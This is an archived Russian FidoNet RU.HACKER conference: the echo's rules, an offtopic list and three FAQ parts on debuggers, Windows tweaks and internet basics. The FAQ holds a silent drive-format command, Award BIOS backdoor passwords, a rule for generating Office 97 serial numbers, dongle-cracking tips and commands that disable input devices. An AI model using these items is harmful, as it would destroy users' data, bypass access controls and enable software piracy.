║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6637 [1-10330] K/s From : Moderator's Post 15-Aug-03 08:40:28 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6638 [1-10330] K/s From : Moderator's Post 15-Aug-03 08:40:29 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6639 [1-10330] K/s From : Moderator's Post 15-Aug-03 08:40:29 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как <F5>) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime <n> - yстановить новyю частотy мигания <n> кypсоp rundll32 user, setdoubleclicktime <n> - yстановить новyю скоpость <n> двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6640 [1-10330] K/s From : Moderator's Post 15-Aug-03 08:40:30 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом 